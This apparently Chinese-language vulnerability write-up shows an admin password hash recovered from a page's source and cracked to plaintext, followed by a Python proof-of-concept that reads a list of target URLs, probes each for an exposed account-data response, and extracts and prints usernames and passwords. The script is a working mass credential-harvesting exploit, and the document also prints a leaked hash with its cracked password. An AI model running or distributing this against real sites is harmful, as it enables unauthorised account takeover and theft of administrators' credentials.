漏洞演示
访问地址
按 F12 查看页面源代码
md5解码:
| md5加密 | 解码 |
|---|---|
| 40b5daa2352b825d66b8080617408284 | reach123 |
登录成功
poc/exp验证
import requests
import re
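def start(headers):
    """Request every URL listed in ``1.txt`` and pass each response to ``start1``.

    The file is read line by line and each non-empty line is treated as one
    URL. Request failures are reported on stdout and the run continues with
    the next entry.

    Args:
        headers: HTTP headers sent with every GET request.
    """
    with open("1.txt", "r") as f:
        for line in f:
            target = line.strip()
            if not target:
                # A blank line is not a URL; requesting it would only
                # produce a spurious error entry in the report.
                continue
            try:
                # Without a timeout a single unresponsive host blocks the
                # whole run indefinitely.
                response = requests.get(url=target, headers=headers, timeout=10)
            except requests.RequestException:
                print("[-]"+target+"[+]"+"错误")
                continue
            # Kept outside the try block so that a failure while evaluating
            # the response is not misreported as a connection error.
            start1(response, target)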
def start1(response,f2):
    """Report whether a response shows the account-data exposure.

    A response counts as exposed when its body contains both ``super_admin``
    and ``password`` and the HTTP status is 200. For an exposed response the
    values following ``name":"`` and ``password":"`` are extracted and printed.

    NOTE(review): the printed password values are credential material. The
    accompanying write-up shows one such value to be an MD5 digest that was
    recovered to plaintext, so scan output should be stored and shared as
    sensitive data.

    Args:
        response: Object exposing ``text`` and ``status_code``.
        f2: The URL that was requested, used only for the report line.
    """
    body = response.text
    exposed = (
        "super_admin" in body
        and "password" in body
        and response.status_code == 200
    )
    if not exposed:
        print("[-]" + f2 + "[+]" + "不存在该漏洞")
        return

    print("[-]" + f2 + "存在该漏洞"+ "[+]")
    # Empty captures are dropped so only populated fields are listed.
    names = [value for value in re.findall('.name":"(.*?)"', body) if value]
    passwords = [value for value in re.findall('.password":"(.*?)"', body) if value]
    print(names)
    print(passwords)
    print("-" * 110)
if __name__ == '__main__':
    # Browser-like User-Agent string sent with every check request.
    user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
    headers = {"User-Agent": user_agent}
    start(headers)